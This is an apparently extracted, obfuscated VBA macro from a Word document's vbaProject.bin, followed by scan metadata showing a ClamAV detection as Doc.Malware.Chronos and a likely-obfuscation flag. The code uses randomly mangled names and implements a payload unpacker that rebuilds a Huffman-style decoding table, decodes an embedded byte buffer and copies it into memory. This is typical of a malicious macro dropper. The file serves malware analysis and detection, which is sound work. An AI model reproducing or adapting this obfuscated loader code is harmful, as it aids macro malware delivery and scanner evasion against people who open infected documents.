Dim VbtNVJJPmm As Long, YNXWc8Swl As Long
VbtNVJJPmm = 16
YNXWc8Swl = 47
If VbtNVJJPmm + YNXWc8Swl > 4 Then
YNXWc8Swl = VbtNVJJPmm + 27
Else
MsgBox 33
End If
End Sub
Private Sub U4j0Mutcw(IbIZc4MDUIW5() As Byte, M1Ml0uRV0i As Long)
Dim RHz39AqVIzU7yg As Long, W61R5 As Long, H7aK As Byte, BkedkgiyKUZ4u4Smm As Long, Nl4DWWC9qyeKJpT As Integer, NVUaE As Byte, XekBgxC2kS90j8tb() As Byte, Ys77QvqqoN1 As Integer
Dim Ennhv As Long, CKUS2WBcJfv6t As Byte, YGpuGcg2I4kd As Long, OL5rIjPqlH As Long, VqRbjEvtgBC1fKk As Long, AsWQpCZRTgZ(0 To 7) As Byte, K0XNnEawS6lMTQx(0 To 511) As HnF3nxQRcws6HMjP, IAmHO3mQ(0 To 255) As UP6g2cwz9
BkedkgiyKUZ4u4Smm = 1
NVUaE = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
XtJgfXpzM0o 4, VarPtr(YGpuGcg2I4kd), VarPtr(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 4
VqRbjEvtgBC1fKk = YGpuGcg2I4kd
If (YGpuGcg2I4kd = 0) Then Exit Sub
ReDim XekBgxC2kS90j8tb(0 To YGpuGcg2I4kd - 1)
XtJgfXpzM0o 2, VarPtr(Nl4DWWC9qyeKJpT), VarPtr(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 2
For RHz39AqVIzU7yg = 1 To Nl4DWWC9qyeKJpT
With IAmHO3mQ(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
.Jyq7kWxLEuXU = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
ReDim .Psfw7jyizqX2pBr(0 To .Jyq7kWxLEuXU - 1)
End With
Next
AsWQpCZRTgZ(0) = 2 ^ 0
AsWQpCZRTgZ(1) = 2 ^ 1
AsWQpCZRTgZ(2) = 2 ^ 2
AsWQpCZRTgZ(3) = 2 ^ 3
AsWQpCZRTgZ(4) = 2 ^ 4
AsWQpCZRTgZ(5) = 2 ^ 5
AsWQpCZRTgZ(6) = 2 ^ 6
AsWQpCZRTgZ(7) = 2 ^ 7
CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
Ys77QvqqoN1 = 0
For RHz39AqVIzU7yg = 0 To 255
With IAmHO3mQ(RHz39AqVIzU7yg)
If (.Jyq7kWxLEuXU > 0) Then
For W61R5 = 0 To (.Jyq7kWxLEuXU - 1)
If (CKUS2WBcJfv6t And AsWQpCZRTgZ(Ys77QvqqoN1)) Then .Psfw7jyizqX2pBr(W61R5) = 1
Ys77QvqqoN1 = Ys77QvqqoN1 + 1
If (Ys77QvqqoN1 = 8) Then
CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
Ys77QvqqoN1 = 0
End If
Next
End If
End With
Next
If (Ys77QvqqoN1 = 0) Then BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm - 1
OL5rIjPqlH = 1
K0XNnEawS6lMTQx(0).O2jX1pn7C = -1
K0XNnEawS6lMTQx(0).Qoey8CXRBAw3 = -1
K0XNnEawS6lMTQx(0).UVv = -1
K0XNnEawS6lMTQx(0).SNovaUJISNL = -1
For RHz39AqVIzU7yg = 0 To 255
GuQHe80AnN K0XNnEawS6lMTQx(), OL5rIjPqlH, RHz39AqVIzU7yg, IAmHO3mQ(RHz39AqVIzU7yg)
Next
YGpuGcg2I4kd = 0
For BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm To M1Ml0uRV0i
CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
For Ys77QvqqoN1 = 0 To 7
If (CKUS2WBcJfv6t And AsWQpCZRTgZ(Ys77QvqqoN1)) Then Ennhv = K0XNnEawS6lMTQx(Ennhv).Qoey8CXRBAw3 Else Ennhv = K0XNnEawS6lMTQx(Ennhv).O2jX1pn7C
If (K0XNnEawS6lMTQx(Ennhv).SNovaUJISNL > -1) Then
XekBgxC2kS90j8tb(YGpuGcg2I4kd) = K0XNnEawS6lMTQx(Ennhv).SNovaUJISNL
YGpuGcg2I4kd = YGpuGcg2I4kd + 1
If (YGpuGcg2I4kd = VqRbjEvtgBC1fKk) Then GoTo VqRbjEvtgBC1fKk
Ennhv = 0
End If
Next
Next
VqRbjEvtgBC1fKk:
H7aK = 0
For RHz39AqVIzU7yg = 0 To (YGpuGcg2I4kd - 1)
H7aK = H7aK Xor XekBgxC2kS90j8tb(RHz39AqVIzU7yg)
Next
ReDim IbIZc4MDUIW5(0 To YGpuGcg2I4kd - 1)
XtJgfXpzM0o YGpuGcg2I4kd, VarPtr(IbIZc4MDUIW5(0)), VarPtr(XekBgxC2kS90j8tb(0))
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 52736 bytes
SHA-256: ad30cec5403b32e8cafacb7dfa038e15e53f6a282cf554eff23f836c552880e4
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
311 of 622 identifiers look randomly generated (e.g. 'E0CD1E5D1FDDB01DB01DB01DB01') — consistent with name-mangling obfuscation.